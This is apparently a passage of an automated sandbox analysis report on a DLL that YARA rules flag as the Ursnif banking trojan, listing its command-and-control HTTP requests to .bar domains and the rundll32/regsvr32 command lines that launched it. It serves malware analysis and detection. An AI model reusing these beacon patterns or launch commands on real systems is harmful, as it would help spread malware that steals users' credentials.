                  Jan 21, 2022 07:55:30.921610117 CET12403OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.228916883 CET12404OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:31.541513920 CET12404OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:32.150764942 CET12405OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:33.354209900 CET12406OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:55:35.760483980 CET12407OUTGET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  6 | 192.168.2.3 | 49750 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:32.300170898 CET1140OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  60 | 192.168.2.3 | 49894 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:39.651832104 CET12408OUTGET /drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  61 | 192.168.2.3 | 49895 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:40.062398911 CET12409OUTGET /drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f/MEql68nFt/nYxdw4RZXpFaqbijhmkw/0I3UhZ9PcRsKOEspkq8/7YzXu2AOi0fYDlLet1LtxN/Z8j42Kwsx6Kh3/NutAzqvZ/KcYW58Xr4T1MQTJAJB2YAhX/pcuj3_2Fx_/2BQrkwFa603_2B68s/I0dGq_2F0eCx/w74Pufb9K3x/hd2DOR_2F/4NgLz6GD.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: intermedia.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  62 | 192.168.2.3 | 49897 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:55:59.956077099 CET12411OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:00.387495995 CET12412OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:00.903311968 CET12413OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:01.856380939 CET12414OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:03.747212887 CET12415OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:07.528678894 CET12416OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:15.077811956 CET12417OUTGET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  63 | 192.168.2.3 | 49898 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:56:00.402211905 CET12412OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:00.840862036 CET12413OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:01.387602091 CET12414OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:02.387679100 CET12415OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:04.387835979 CET12416OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:08.372697115 CET12417OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:16.326375961 CET12418OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  7 | 192.168.2.3 | 49755 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:33.154788971 CET1141OUTGET /drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_2FOanliZpdSkommO/z_2FFnfFWj/XA9wFW7rsFws4V6TO/ECxua93xQfvB/2xJ5KsVMA_2/BJTXWzwMMI1Ry4/bSrLklQhxwLVQio5vEqnT/EuTu1lXMUBYE4EO9/fehTx7dve_2FJwl/oHCMlYRgtjfgvp4PcC/lf7RvC6QF/AJjhNY359JkAlb/_2BCF.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  8 | 192.168.2.3 | 49752 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:33.156999111 CET1142OUTGET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  9 | 192.168.2.3 | 49756 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:33.200898886 CET1143OUTGET /drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll"
                  Imagebase:0xbb0000
                  File size:116736 bytes
                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
                  Imagebase:0xd80000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\regsvr32.exe
                  Wow64 process (32bit):true
                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll
                  Imagebase:0x2b0000
                  File size:20992 bytes
                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
                  Imagebase:0x300000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Start time:07:52:09
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
                  Imagebase:0x300000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
